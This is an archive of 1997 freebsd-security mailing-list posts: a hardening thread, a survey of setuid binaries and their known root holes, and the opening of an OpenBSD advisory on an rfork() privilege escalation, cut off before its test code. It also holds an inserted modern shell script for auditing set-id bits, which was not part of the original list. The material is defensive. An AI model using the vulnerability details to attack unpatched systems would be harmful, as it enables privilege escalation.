* IPSEC support within the Mobile IP daemons. All traffic between mobile nodes and their home agents may be encrypted, essentially creating a virtual private network. Foreign agents are not involved in the IPSEC security associations, but are tunneled over. In this release, encryption is supported only when the mobile node is at a foreign agent unless PSU's ad hoc mode is used; in that case, encryption may be used when the mobile node is at its home agent as well as at foreign agents. Also, foreign agents may require home agents to authenticate IPIP packets they send, preventing attackers from using foreign agents to circumvent a firewall.

* Ported to FreeBSD 2.2.1.

* Interoperability fixes from the interoperathon tests sponsored by FTP Inc. shortly before the Memphis IETF meeting.

* Numerous bug fixes.
Noteworthy properties of PSU's implementation in general:

* Foreign agent switching based on WaveLAN signal strength (other link layer technologies are supported, but switching is less intelligent).

* An optional replacement for ARP called "ad hoc" mode that eliminates ARP spoofing attacks. In this mode, logical networks are defined by a shared secret key, and every host regularly broadcasts its MAC->IP address binding. This mode also permits mobile nodes to communicate with each other directly, even if no foreign or home agents can be accessed.

* Minimal kernel changes that provide basic, general-purpose mechanisms upon which Mobile IP daemons are implemented.

* Foreign agents can have mobile security associations with both mobile nodes and home agents, as described in the RFC.

* X-based user interface to monitor and control the mobile node.

* Both multicast and broadcast agent advertisements.

* ISA and PCMCIA WaveLAN drivers and applications to configure them.

* NRL's IPSEC, ported to FreeBSD, with extensions to allow IPSEC security associations to be bound to routes. This allows virtual private networks to be created by simply configuring the routing table appropriately.

From owner-freebsd-security Fri Aug 1 22:01:32 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA02161 for security-outgoing; Fri, 1 Aug 1997 22:01:32 -0700 (PDT)
Received: from python.shoal.net.au (perrya@python.shoal.net.au [203.26.44.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA02150 for ; Fri, 1 Aug 1997 22:01:24 -0700 (PDT)
Received: from localhost (perrya@localhost) by python.shoal.net.au (8.8.6/8.8.5) with SMTP id PAA04620; Sat, 2 Aug 1997 15:00:35 +1000 (EST)
Date: Sat, 2 Aug 1997 15:00:34 +1000 (EST)
From: Andrew
To: yossman
cc: freebsd-security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

So write one :-) I'm sure that if you wrote the things you do and submitted it for comment you could end up with a relatively complete document. Probably wouldn't be a substitute for reading a few of the recommended books but it might be somewhere to start.

Andrew Perry
andrew@shoal.net.au

On Thu, 31 Jul 1997, yossman wrote:

> On Tue, 29 Jul 1997 sthaug@nethelp.no wrote:
>
> > I like the FreeBSD distributions - but I would be much happier if there
> > was an easy way to make a system more secure. For instance a document
> > which told you:
> >
> > - These files are only necessary if you need functionality X (uucp is
> > an example here). If you don't need functionality X, they can be safely
> > removed.
>
> [...]
>
> i would be VERY happy if such a document was released and was reasonably
> complete. setting up a new unix machine takes me at least a week of
> futzing around with security-related issues before i'm satisfied it's
> ready to be used with some assurance it's not going to be easily broken.
> having such a document as an additional information source would be
> awesome.
>
>
> yossman
>
> ------------------------------------------------------------------------
> Yossarian Holmberg (yossman) yossman@canweb.net
> System Administrator, National Online http://www.canweb.net/~yossman/
> my statements are my own, not my employer's -- i do not speak for them.
>
> '... and if i die, before i learn to speak .. can money pay for all the
> days i've lived awake but half asleep?'
> -- Primitive Radio Gods,
> "Standing Outside a Broken Phone Booth With Money In My Hand"
>
>

From owner-freebsd-security Fri Aug 1 22:38:14 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA03404 for security-outgoing; Fri, 1 Aug 1997 22:38:14 -0700 (PDT)
Received: from dog.farm.org (gw-serial2.farm.org [207.111.140.45]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA03364 for ; Fri, 1 Aug 1997 22:37:03 -0700 (PDT)
Received: (from dk@localhost) by dog.farm.org (8.7.5/dk#3) id WAA14747; Fri, 1 Aug 1997 22:33:14 -0700 (PDT)
Date: Fri, 1 Aug 1997 22:33:14 -0700 (PDT)
From: Dmitry Kohmanyuk
Message-Id: <199708020533.WAA14747@dog.farm.org>
To: peter@grendel.IAEhv.nl (Peter Korsten)
Cc: freebsd-security@freebsd.org
Subject: Re: Keep UUCP (Was: Re: security hole in FreeBSD)
Newsgroups: cs-monolit.gated.lists.freebsd.security
Organization: FARM Computing Association
Reply-To: dk+@ua.net
X-Newsreader: TIN [version 1.2 PL2]
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In article <19970731014354.30839@grendel.IAEhv.nl> you wrote:
> Jay D. Nelson shared with us:
> > Sometimes I think we can be too "internet-centric" for our own
> > good. UUCP makes good security and economic sense.
> >
> > [lotsa points deleted]
> >
> > Make it an install option if you want, but leave it as a part of the
> > standard distribution.

> I can only agree with this. As long as queued SMTP isn't commonly
> used, keep UUCP. (And then there's the News thing, too.)

also, why do you folks think uucp is only for e-mail? it's also a nice remote batch execution environment. (works over TCP, too.) Consider:

uux 'host1!prog -flags' 'host2!file1' 'host3!file2'

(I actually use it this way.)

> For a non-connected host, who wants to use standard mailers like
> Mutt or Elm, there's no real alternative.

I have set up a network at university to use uucp as a backup for mail, with dial-out when the leased line came down on weekends... It still works.
--
"The number of Unix installations has grown to 10, with more expected"
- The Unix Programmer's Manual, 2nd Edition, June, 1972

From owner-freebsd-security Fri Aug 1 23:42:18 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA05764 for security-outgoing; Fri, 1 Aug 1997 23:42:18 -0700 (PDT)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA05758 for ; Fri, 1 Aug 1997 23:42:16 -0700 (PDT)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id AAA03537 for freebsd-security@FreeBSD.ORG; Sat, 2 Aug 1997 00:42:14 -0600 (MDT)
Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id AAA08077 for ; Sat, 2 Aug 1997 00:40:51 -0600 (MDT)
Date: Sat, 2 Aug 1997 00:40:50 -0600 (MDT)
From: Marc Slemko
To: freebsd-security@FreeBSD.ORG
Subject: Re: Minimum files for operation
In-Reply-To: <199706270133.SAA25974@kirk.edmweb.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Thu, 26 Jun 1997, Steve wrote:

> There was a post to this list briefly explaining the functions of most
> of the suid programs... Check the archives for a message from Marc
> Slemko, subject "setuid programs in freebsd".

It is included below. It is out of date. Some of the comments are not quite right. It is no longer complete. I don't have time to update it and haven't even looked at it for a long time. I was planning a nice menu-driven program to allow people to tighten down the security of their system, but other things came up and those other things will occupy all my spare development time for the foreseeable future.

$Id: setuid.txt,v 1.3 1996/09/30 03:41:30 marcs Exp marcs $

 7681 240 -r-sr-xr-x 1 uucp bin  110592 Jul 16 20:17 ./usr/bin/cu
 7682 152 -r-sr-xr-x 1 uucp bin   77824 Jul 16 20:17 ./usr/bin/uucp
 7684  72 -r-sr-xr-x 1 uucp bin   36864 Jul 16 20:17 ./usr/bin/uuname
 7687 168 -r-sr-xr-x 1 uucp bin   86016 Jul 16 20:17 ./usr/bin/uustat
 7689 160 -r-sr-xr-x 1 uucp bin   81920 Jul 16 20:18 ./usr/bin/uux
99849 400 -r-sr-xr-x 1 uucp bin  196608 Jul 16 20:17 ./usr/libexec/uucp/uucico
99850 176 -r-sr-x--- 1 uucp uucp  90112 Jul 16 20:18 ./usr/libexec/uucp/uuxqt

USE: Used by uucp.

IMPACT: If you are not using uucp on your system, removing the setuid flag from uucp, uuname, uustat, uux, uuxqt and uucico will have no impact on the functionality of your system. If you use cu for accessing ports, removing the setuid flag may or may not affect its use depending on how you use it. If you are using uucp, there is no easy way, and arguably no need, to remove the setuid flag.
COMMENTS: Since they are setuid uucp and not root, a security hole would only result in someone gaining access to the uucp user. If you are using uucp, compromising the uucp user means that all your uucp traffic can be compromised. If you aren't using uucp, compromising the uucp user means that, on systems using the default permissions for /dev/cua*, access to any serial devices on the system will be gained. If those devices include modems, long distance phone calls could be made.

7745 576 ---s--x--x 2 root bin 286720 Jul 16 20:21 ./usr/bin/suidperl
7745 576 ---s--x--x 2 root bin 286720 Jul 16 20:21 ./usr/bin/sperl4.036

suidperl and sperl4.036 are both links to the same file. suidperl should be taken to refer to both suidperl and sperl4.036. If you installed perl5, there will also be suidperl and sperl* in /usr/local/bin; the same comments apply to them.

USE: suidperl is a part of perl that allows for secure execution of setuid and setgid perl scripts. Traditionally, setuid and setgid scripts have been insecure due to a race condition when executing the script. suidperl provides a workaround. See the perlsec(1) (in perl 5) or perl(1) (in perl 4; under the 'Setuid Scripts' section; the perl 4 man page is quite incomplete in this regard, so you probably want to use the perl5 one) man page for more details.

IMPACT: Removing the setuid flag from suidperl will mean that setuid or setgid perl scripts will no longer work. Most people don't use them, so for most people this is of little consequence.

COMMENTS: There was a rather large security hole discovered in suidperl soon before the 2.1.5 release that allowed any user to gain root access on many systems with suidperl installed. FreeBSD 2.1.0 was vulnerable; 2.1.5 is not. If you are still running a 2.1.0 system and have not fixed suidperl, take the suid flag off suidperl and sperl* immediately and find out more about the problem.
Although, as far as anyone knows, suidperl is now secure, I would advise removing the setuid flags from all copies of 'sperl*' and 'suidperl' on your system if you don't use setuid or setgid perl scripts.

7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/at
7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/atq
7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/atrm
7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/batch

at, atq, atrm and batch are links to the same file.

USE: Used to schedule jobs in a similar way to cron, except designed more for non-repeating one time jobs.

IMPACT: Removing the setuid flag results in users other than root being unable to use at.

7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chpass
7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chfn
7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chsh
7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchpass
7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchfn
7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchsh

chpass, chfn, chsh, ypchpass, ypchfn and ypchsh are links to the same file.

USE: Used to change various information in the password file.

IMPACT: If the setuid flag is removed, users will be unable to change information in the password file.

7836 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/keyinit

USE: Used by the S/Key authentication system to initialize the use of S/Key one time passwords for logins.

IMPACT: Removing the setuid flag from keyinit means that the S/Key authentication system will no longer be functional on your system.

COMMENTS: *** Pointer to S/Key info. *** Does S/Key need to be setuid root?

7843 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/lock

USE: Allows the user to 'lock' their terminal from being used until either the given password or login password (depending on command line options) is given or the program times out.

IMPACT: *** None?!?!
(won't let user use login password to disable)

COMMENTS: *** error in source --> no root password

7845 40 -r-sr-xr-x 1 root bin 20480 Jul 16 20:30 ./usr/bin/login

USE: Used by many programs in the login name to authenticate by username and password. Can also be used by a user already logged in to get a new login prompt if they wish to login again, possibly as another user.

IMPACT: Removing the setuid flag from login results in people who are already logged in being unable to run login to get a new login prompt. For most systems this is not a problem, and many Unixes even ship without login setuid.

COMMENT: Although login should be quite secure, and does run as root anyway from programs such as telnetd, removing the setuid flag has so few side effects that it is worthwhile doing if acceptable in your situation.

7868 40 -r-sr-xr-x 2 root bin 20480 Jul 16 20:30 ./usr/bin/passwd
7868 40 -r-sr-xr-x 2 root bin 20480 Jul 16 20:30 ./usr/bin/yppasswd

passwd and yppasswd are links to the same file.

USE: Allows users to change their password.

IMPACT: Removing the setuid flag from passwd means that users will be unable to change their passwords. There are few environments in which this is practical.

COMMENTS: This is one of the things that it is reasonable to require a program that is setuid root to do. People interested in increasing the security of user passwords should look at something like ANLpasswd which checks user passwords in an attempt to encourage the user to choose a secure password. *** add pointer to more info

7873 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/quota

USE: Displays information about users' disk usage and limits.

IMPACT: Removing the setuid flag means that only users with access to read quota.user on the relevant partition will be able to get quota information. If you aren't using quotas, removing the setuid flag will have no impact on operations.

COMMENTS: *** why is it setuid root? why not setgid something?
7875 88 -r-sr-xr-x 1 root bin 45056 Jul 16 20:30 ./usr/bin/rdist

USE: rdist is a program that allows for automated remote file distribution.

IMPACT: Removing the setuid flag means that only root will be able to use rdist. If you aren't using rdist, removing the setuid flag will have no impact on operations.

COMMENTS: There was a rather large security hole discovered in rdist soon before the 2.1.5 release that allowed any user to gain root access on most systems with rdist installed. FreeBSD 2.1.0 is vulnerable; 2.1.5 is not. If you are still running a 2.1.0 system and have not fixed rdist, take the suid flag off rdist immediately and find out more about the problem.

Although, as far as anyone knows, the current rdist is secure, I would recommend removing the setuid flag from rdist. If you require the functionality provided by rdist, there is a rdist-6.1.2 package/port which uses rsh; since it uses rsh and does not call rcmd(3) directly, it does not need to be setuid root. Also note that both versions of rdist use host based security, which has some quite serious flaws. It is possible to make ssh work with the rdist-6.1.2 package; that is strongly recommended if you need to use rdist.

7878 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:30 ./usr/bin/rlogin

USE: rlogin allows you to login remotely to a machine over the network.

IMPACT: Removing the setuid flag from rlogin means that users other than root will be unable to use rlogin to connect to remote hosts.

COMMENTS: There was a security hole in rlogin that was patched soon after the 2.1.5 release. I have not investigated it in depth, nor have I heard of any exploits for it, but it is possible that the hole discovered could allow others to gain root access to your system. *** more info, pointer to fixed binary?

In many environments, rlogin can not be disabled without having an unacceptable impact on system usability. *** add note on rlogin and host based auth in general?
7882 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:31 ./usr/bin/rsh

USE: rsh is similar to rlogin in that it allows remote execution of commands, however rsh can not be used with interactive commands. *** fix up

IMPACT: Removing the setuid flag from rsh means that users other than root will be unable to use rsh to connect to remote hosts.

COMMENTS: In many environments, rsh can not be disabled without having an unacceptable impact on system usability.

7901 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:31 ./usr/bin/su

USE: su is used to switch the user you are running as. It can be used by those in group wheel to switch to the root user (uid 0), and by others to switch to other users. Authentication is by password.

IMPACT: Removing the setuid flag from su means that users other than root will be unable to use su to switch to other users.

COMMENTS: In most cases, unless some alternative such as sudo is being used, removing the setuid flag from su is a very bad idea since it means people need to login as root directly to do things requiring superuser privileges. In many environments, an acceptable alternative is to chgrp su to group wheel and take away execute permission to people not in group wheel. This means that while people in group wheel can still use su to switch users, others will be unable to use it. To some, this is viewed as being desirable in itself, regardless of other security improvements that it may make.

7960 48 -r-sr-xr-x 1 root bin 24576 Jul 16 20:33 ./usr/bin/crontab

USE: crontab is used by users to edit their crontab files.

IMPACT: Removing the setuid flag from crontab means that users other than root will be unable to modify their crontabs.

COMMENTS: At some sites, local policy is to not let users have their own crontabs. If this is the case, it can be worthwhile to make a separate group for those users allowed to have crontabs and only allow users in that group to run crontab.
7964 32 -r-sr-sr-x 1 root daemon 16384 Jul 16 20:33 ./usr/bin/lpq
7965 40 -r-sr-sr-x 1 root daemon 20480 Jul 16 20:33 ./usr/bin/lpr
7966 32 -r-sr-sr-x 1 root daemon 16384 Jul 16 20:33 ./usr/bin/lprm

USE: All part of the BSD line printer system used for print queueing, both locally and to and from remote hosts.

IMPACT: Removing the setuid and setgid flags from the above three utilities means that users other than root will be unable to execute them to submit or remove print jobs. There is an associated program called lpc that is setgid daemon and which can be used, by authorized users, to control print queuing. On hosts that do not use this system for print queueing, removing the setuid and setgid flags will have no impact.

COMMENTS: Although lpd and associated programs do not have any currently known problems, I hesitate to trust them. There is no real need for such a program to run as root most of the time. If you don't use them, disable them. If you do need the functionality that they provide, I suggest you take a look at LPRng (which originates from PLP). LPRng is a much more secure replacement to lpd and associated programs that also adds numerous features. It is available at ftp://dickory.sdsu.edu/pub/LPRng.

7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/bin/newaliases
7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/bin/mailq
7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/sbin/sendmail

These three programs are links to the same file.

USE: Sendmail is a full featured SMTP transport program.

IMPACT: Removing the setuid flags from these programs, without some fairly in-depth other changes, will result in very major problems, even if you aren't connected to the Internet.

COMMENTS: *** It's sendmail. smapd, smrsh, other programs to help reduce risk? alternatives? don't run sendmail as daemon if you don't need to receive mail.
*** recent bug fixes

76850 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:22 ./usr/libexec/mail.local

USE: Part of sendmail; used for local mail delivery.

IMPACT: Removing the setuid flag from mail.local, without numerous other changes, will result in major problems on your system.

COMMENTS: *** related to sendmail, setgid possibilities

65 40 -rwsr-xr-x 1 root bin 20480 Jul 16 20:33 ./usr/sbin/mrinfo
67 56 -rwsr-xr-x 1 root bin 28672 Jul 16 20:33 ./usr/sbin/mtrace

USE: Used to debug multicast routing.

IMPACT: Removing the setuid flag from mrinfo and mtrace will mean that users other than root will be unable to use these utilities to get information about multicast routing. If you aren't using multicast routing, they can be disabled without problem.

COMMENTS: If you don't know what multicast routing is, you almost certainly aren't using it.

91 168 -r-sr-xr-x 1 root bin 86016 Jul 16 20:34 ./usr/sbin/ppp

USE: Establish ppp connections using kernel level ppp.

IMPACT: Removing the setuid flag results in users other than root being unable to run kernel level ppp.

COMMENTS: If you are using user level ppp (see "/usr/sbin/ppp"), disabling kernel level ppp ("pppd") will have no impact on your ppp connections. On many systems that do use pppd, there is no need to have it executable by everyone so restricting execution to a specific group may be appropriate.

92 128 -r-sr-xr-x 1 root bin 65536 Jul 16 20:34 ./usr/sbin/pppd

USE: Establishing ppp connections using user level ppp.

IMPACT: Removing the setuid flag results in users other than root being unable to run kernel level ppp.

COMMENTS: If you are using kernel level ppp (see "/usr/sbin/pppd"), disabling user level ppp will have no impact on your ppp connections. On many systems that do use user level ppp, there is no need to have it executable by everyone so restricting execution to a specific group may be appropriate.
Personally, I have some serious (perhaps unfair; I have NOT really looked into the code in depth) concerns about the thought given by the author to security while writing "ppp". These concerns include things such as the suggested login script in the man page (although that may or may not have been suggested by the original author; see PR 1383 for details) and the default of allowing telnet connections to manage the ppp session. *** info on recent bug and fix

108 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:34 ./usr/sbin/sliplogin

USE: Establishing a SLIP connection.

IMPACT: Removing the setuid flag results in users other than root being unable to properly establish a SLIP connection.

COMMENTS: If you don't use slip, take the setuid flag off. There was a security hole in old versions that was fixed as of 1996/04/24; 2.1.0 is vulnerable, 2.1.5 should be fixed.

118 40 -r-sr-xr-x 1 root bin 20480 Jul 16 20:34 ./usr/sbin/timedc

USE: Used to control the time daemon timed.

IMPACT: Removing the setuid flag results in users other than root being unable to use timedc. timedc is setuid because it needs to bind to a privileged port. If you don't use timedc, timed should work just fine with the setuid flag removed from timed.

COMMENTS: This code seems relatively secure since it gets rid of its root privileges right after it binds to the port.

119 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:34 ./usr/sbin/traceroute

USE: Used to trace the route that IP packets follow over a network. Extremely useful for users in many environments.

IMPACT: Removing the setuid flag results in users other than root being unable to use traceroute.

COMMENTS: There have been some recent security fixes in traceroute, but I am uncertain as to if they fix exploitable holes. ***

207 352 -r-sr-xr-x 1 root bin 172032 Jul 16 20:15 ./bin/rcp

USE: Used to copy files across the network.

IMPACT: Removing the setuid flag results in users other than root being unable to use rcp.
COMMENTS: rcp uses host based security and is vulnerable to things such as IP spoofing. A bad thing to use, not just because of any possible security problems in the binary. ssh is a more secure solution that is worth investigating.

686 384 -r-sr-sr-x 2 root tty 188416 Jul 16 20:23 ./sbin/dump
686 384 -r-sr-sr-x 2 root tty 188416 Jul 16 20:23 ./sbin/rdump

dump and rdump are links to the same file.

USE: Used for local and network backups.

IMPACT: Removing the setuid flag results in users other than root being unable to perform backups of the filesystem.

COMMENTS: The idea is that anyone in the 'operator' group is able to do backups without having to be root. This is an ideal candidate for restricting execution by means of group, except for the fact that it has to be setgid tty to allow the 'n' option to work. If you don't use the 'n' option, remove the setgid flag, change it to group operator, and remove the world execute flag. Then only those in the operator group can exploit any security holes that may be there, and since generally they can read from the raw disk device anyway... If it is not setuid root, then local backups can still work as long as the person doing them has access to the raw device file and the dump device, however network backups will not work because rcmd(3) will fail.

717 256 -r-sr-xr-x 1 root bin 118784 Jul 16 20:24 ./sbin/ping

USE: ping is used to send icmp echo requests to hosts on the network for the purpose of determining reachability.

IMPACT: Removing the setuid flag results in users other than root being unable to use ping.

COMMENTS: ping is a very useful thing for users, although there are possible denial of service attacks possible, especially with the '-l' option. There have been some potential security holes fixed after 2.1.5 was released, but it appears like none of them are exploitable. Perhaps.
721 416 -r-sr-sr-x 2 root tty 204800 Jul 16 20:24 ./sbin/restore
721 416 -r-sr-sr-x 2 root tty 204800 Jul 16 20:24 ./sbin/rrestore

restore and rrestore are links to the same file.

USE: Used for local and network restores.

IMPACT: same as dump

COMMENTS: same as dump

722 272 -r-sr-xr-x 1 root bin 126976 Jul 16 20:24 ./sbin/route

USE: route is used to maintain the routing table.

IMPACT: Removing the setuid flag results in users other than root being unable to access the routing table via route. Normally users can't change routes anyway, so the only thing you lose is 'route get' and 'route monitor'.

COMMENTS: minimal impact in most situations if the setuid flag is removed.

726 288 -r-sr-x--- 1 root operator 139264 Jul 16 20:24 ./sbin/shutdown

USE: Used to shutdown the system.

IMPACT: Removing the setuid flag results in users other than root being unable to use shutdown.

COMMENTS: it is restricted to execution by those in the operator group anyway, so as long as you are careful about who you put in the operator group there should be little risk.

734 288 -r-sr-xr-x 1 root bin 139264 Jul 16 20:24 ./sbin/mount_msdos

USE: Used to mount MS-DOS filesystems.

IMPACT: Removing the setuid flag results in users other than root being unable to mount DOS filesystems.

COMMENTS: I sure don't want users mounting filesystems on my box. While it is true that in some situations it can be useful to allow users to do so, I much prefer mtools if users need access to DOS filesystems. I find it more an issue of stability than security, since I don't trust the FreeBSD DOS filesystem code.
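The survey above keeps returning to two actions: find out which binaries carry a set-id bit, and restrict the ones you keep (su to wheel, crontab to a dedicated group, dump to operator) instead of leaving them world-executable. The script below is an added example and is not part of the survey or of the FreeBSD tree. It parses a find -ls style listing of the kind quoted throughout the survey, classifies each entry as setuid, setgid or both (the setgid-only case the survey does not list separately is handled too), and applies the chgrp-plus-chmod step to a throwaway file in a temporary directory so the result can be checked without touching a real binary. The function names and the four-line sample listing are the example's own; the sample copies the survey's format but is constructed.

```sh
#!/bin/sh
# Added example: audit set-id bits in "find / -ls" output and apply the
# survey's "restrict execution to a group" step. Function names and the
# sample listing below are this example's own, not part of the survey.

# Classify a symbolic mode string (field 3 of find -ls / ls -l output).
# Position 4 carries the setuid bit and position 7 the setgid bit; an
# upper-case S means the bit is set without the matching execute bit.
classify_mode() {
    m=$1
    out=""
    case "$m" in ???[sS]*) out="setuid" ;; esac
    case "$m" in ??????[sS]*) out="${out:+$out+}setgid" ;; esac
    echo "${out:-none}"
}

# Read find -ls lines on stdin and print "path owner:group class scope"
# for every set-id entry. "world-exec" marks the candidates for the
# chgrp + chmod o-x treatment; "group-only" entries are already restricted.
audit_listing() {
    while read -r _ino _blk mode _links owner group _size _mon _day _time path; do
        cls=$(classify_mode "$mode")
        [ "$cls" = none ] && continue
        case "$mode" in *x) scope=world-exec ;; *) scope=group-only ;; esac
        echo "$path $owner:$group $cls $scope"
    done
}

# Restrict a set-id file to one group: chgrp it, drop all "other" bits,
# and return the resulting 10-character mode so the caller can verify it.
restrict_to_group() {
    f=$1
    g=$2
    chgrp "$g" "$f" && chmod o-rwx "$f" || return 1
    ls -ld "$f" | cut -c1-10
}

# Constructed sample listing in the survey's find -ls format.
SAMPLE='7901 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:31 ./usr/bin/su
7964 32 -r-sr-sr-x 1 root daemon 16384 Jul 16 20:33 ./usr/bin/lpq
726 288 -r-sr-x--- 1 root operator 139264 Jul 16 20:24 ./sbin/shutdown
100 24 -r-xr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/uptime'

# Number of set-id entries the audit finds in the sample (3 of the 4 lines).
count_setid_in_sample() {
    printf '%s\n' "$SAMPLE" | audit_listing | wc -l | tr -d ' '
}

# Demonstrate the hardening step on a throwaway file owned by the caller,
# using the caller's own primary group in place of wheel or operator.
demo_restrict() {
    d=$(mktemp -d) || return 1
    : > "$d/fake-suid"
    chmod 4755 "$d/fake-suid"
    restrict_to_group "$d/fake-suid" "$(id -gn)"
    rm -rf "$d"
}

if [ "${1-}" = run ]; then
    printf '%s\n' "$SAMPLE" | audit_listing
    demo_restrict
fi
```

Run it as "sh audit_setid.sh run" to see the sample audit and the mode left on the throwaway file; on a real system, feed it "find / -type f \( -perm -4000 -o -perm -2000 \) -ls" instead of the sample and review every world-exec line against the survey's IMPACT notes before changing anything.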
From owner-freebsd-security Sat Aug 2 13:47:47 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA13192 for security-outgoing; Sat, 2 Aug 1997 13:47:47 -0700 (PDT)
Received: from firewall.ftf.dk (root@[129.142.64.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA13186 for ; Sat, 2 Aug 1997 13:47:43 -0700 (PDT)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id XAA10054 for ; Sat, 2 Aug 1997 23:12:47 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id WAA07277 for ; Sat, 2 Aug 1997 22:48:00 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.5/8.8.5/prosa-1.1) id WAA18907; Sat, 2 Aug 1997 22:46:54 +0200 (CEST)
Message-ID: <19970802224654.14290@deepo.prosa.dk>
Date: Sat, 2 Aug 1997 22:46:54 +0200
From: Philippe Regnauld
To: freebsd-security@freebsd.org
Subject: Re: security hole in FreeBSD
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Description: Main Body
X-Mailer: Mutt 0.69
In-Reply-To: ; from Andrew on Sat, Aug 02, 1997 at 03:00:34PM +1000
X-Operating-System: FreeBSD 2.2.1-RELEASE i386
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Andrew writes:

> So write one :-)
> I'm sure that if you wrote the things you do and submitted it for comment
> you could end up with a relatively complete document. Probably wouldn't be
> a substitute for reading a few of the recommended books but it might be
> somewhere to start.

This has to be connected with the freebsd-doc people. Since my security hardware is all freebsd, and I seriously need to formalize and document it, I'll try to write a draft of guidelines starting next week and post it in both places.

--
-- Phil

-[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]-
-[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]-

From owner-freebsd-security Sat Aug 2 18:02:49 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA25744 for security-outgoing; Sat, 2 Aug 1997 18:02:49 -0700 (PDT)
Received: from enteract.com (enteract.com [206.54.252.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA25730 for ; Sat, 2 Aug 1997 18:02:40 -0700 (PDT)
Received: (from tqbf@localhost) by enteract.com (8.8.5/8.7.6) id UAA20008; Sat, 2 Aug 1997 20:02:33 -0500 (CDT)
From: "Thomas H. Ptacek"
Message-Id: <199708030102.UAA20008@enteract.com>
Subject: Vulnerability in 4.4BSD rfork() implementation
To: tech@openbsd.org, freebsd-security@freebsd.org
Date: Sat, 2 Aug 1997 20:02:32 -0500 (CDT)
Reply-To: tqbf@enteract.com
X-Mailer: ELM [version 2.4 PL24 ME8a]
Content-Type: text
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

----------------------------------------------------------------------------

OpenBSD Security Advisory

August 2, 1997

Vulnerability in rfork() System Call

----------------------------------------------------------------------------

SYNOPSIS

A vulnerability in certain 4.4BSD kernels allows processes to gain access to restricted resources by manipulating the file descriptor tables of SUID and SGID executables. Applications of this vulnerability will allow users to gain root access.

----------------------------------------------------------------------------

AFFECTED SYSTEMS

It is believed that all 4.4BSD operating systems implementing the rfork() system call are currently vulnerable to this problem. These operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD project has resolved this problem in OpenBSD-current.

The rfork() system call originated in the Plan9 operating system, and the 4.4BSD implementations of it share the original's semantics. Therefore, it is believed that Plan9 may be vulnerable as well.

Code is provided at the end of this document that will allow system operators to test their vulnerability.

----------------------------------------------------------------------------

DETAILS

Recent 4.4BSD operating systems added the rfork() system call as an additional method of creating a new process. Unlike fork(), rfork() allows the caller tighter control over which resources are shared between the parent and child processes. These resources include the per-process descriptor table.

The descriptor table of a process lists all open file descriptors for that process.
Input and output on files, sockets, and pipes is done through these descriptors. Two processes sharing the same descriptor table can read from any file either has open in read mode, and write to any file either has in write mode.

